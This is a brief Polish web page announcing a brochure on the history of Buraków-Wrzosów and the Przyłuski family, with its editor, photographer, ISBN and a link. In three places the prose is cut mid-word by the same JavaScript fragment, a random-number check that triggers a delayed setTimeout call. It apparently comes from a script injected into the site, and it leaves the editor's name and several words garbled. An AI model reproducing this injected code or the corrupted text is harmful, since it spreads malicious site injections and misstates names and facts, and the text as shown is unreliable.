Broszura

Pod redakcją Ewy Pusdom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toły-Kozłowskiej powstała publikacja Buraków-Wrzosów i jego założyciel. Ukazuje ona bardzo dokładnie dzieje rodziny Przyłuskich i ciekawą hisdom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}torię powstania Burakowa-Wrzosowa. Zdjęcia do publikacji przygodom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tował Tomasz Sienicki. Broszura ma nadany numer ISBN 978-83-943362-7-1.

Jeśli chcesz zapoznać się z tekstem publikacji, kliknij w poniższy link:
Buraków-Wrzosów i jego założyciel